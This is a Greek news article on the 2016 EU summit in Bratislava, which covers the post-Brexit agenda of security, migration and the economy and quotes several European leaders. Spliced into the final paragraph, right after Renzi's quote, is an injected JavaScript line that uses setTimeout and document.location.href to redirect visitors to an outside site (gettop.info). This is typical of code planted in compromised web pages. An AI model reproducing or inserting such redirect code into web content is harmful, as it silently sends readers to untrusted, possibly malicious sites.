Σήμερα η Σύνοδος της Μπρατισλάβα – Στο επίκεντρο προσφυγικό και οικονομία

0
6

 

Σε μια Ευρώπη που δοκιμάζεται οι ηγέτες των 27 χωρών μελών της ΕΕ συναντώνται σήμερα στη Σύνοδο της Μπρατισλάβα για να προετοιμάσουν τη… ζωή μετά το Brexit.

Με τη Σλοβακία που έχει την προεδρία της ΕΕ, η Ευρωπαϊκή Ένωση θέλει να στείλει ένα καθαρό μήνυμα ενότητας και αλληλεγγύης. Οι 27 ηγέτες θέλουν να διαμηνύσουν ότι «η ΕΕ παραμένει δυνατή και ικανή να φτάνει σε συμφωνίες και να επιφέρει βελτιώσεις στην καθημερινότητα τον πολιτών της».

Ασφάλεια-άμυνα, Προσφυγικό-Μεταναστευτικό και Οικονομία, είναι τα τρία κεντρικά θέματα στην ατζέντα των συνομιλιών στην Μπρατισλάβα.

Αν και υπάρχουν διφορετικές προσεγγίσεις σε όλα τα θέματα και ως εκ τούτου δεν έχει σημειωθεί πρόοδος, ζητούμενο στις συζητήσεις που θα εκκινήσουν από σήμερα και έπειτα, είναι να επιδειχθεί τουλάχιστον κοινή διάθεση στην κατεύθυνση να υπάρξουν συγκλίσεις.

Κορυφαίοι θεσμικοί Ευρωπαίοι αξιωματούχοι με παρεμβάσεις τους τις τελευταίες ημέρες έστειλαν προς αυτή την κατεύθυνση μηνύματα. Σε αυτό το πλαίσιο έχει ιδιαίτερη σημασία η τοποθέτηση του προέδρου της Κομισιόν Ζαν Κλοντ Γιούνκερ ενώπιον του Ευρωκοινοβουλίου ότι «η Ευρώπη δεν είναι αρκετά κοινωνική και αυτό οφείλουμε να το αλλάξουμε», προτείνοντας και ανάλογα εργαλεία. Το χειρότερο για την Μπρατισλάβα θα είναι να μη βγει κανένα αποτέλεσμα, σημείωνε προ δύο ημερών ο πρόεδρος του Ευρωπαϊκού Κοινοβουλίου, Μάρτιν Σουλτς, στη Le Monde.

Πριν από τη Σύνοδο, υπήρξαν αλλεπάλληλες επαφές μεταξύ των ηγετών, όπως η ευρωμεσογειακή σύνοδος της Αθήνας (Ελλάδα, Γαλλία, Κύπρος, Ιταλία, Ισπανία, Πορτογαλία, Μάλτα) που έστειλε το μήνυμα για την αναγκαιότητα ενός νέου οράματος για την Ευρώπη αλλά και η χθεσινή συνάντηση Ολάντ-Μέρκελ στο Παρίσι.

Ο Γάλλος Πρόεδρος, μετά από τη συνάντηση που είχε με την Άνγκελα Μέρκελ, δήλωσε ότι η Ευρώπη πρέπει να αποκτήσει ένα ξεκάθαρο όραμα για το μέλλον της. Ο Ιταλός πρωθυπουργός Ματέο Ρέντσι, δήλωσε ότι «στην ευρωπαϊκή σύνοδο της Μπρατισλάβα θα φέρω τη φωνή μιας χώρας η οποία κουράστηκε να λαμβάνει κατάλογο με υποχρεώσεις στις οποίες πρέπει να ανταποκριθεί». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here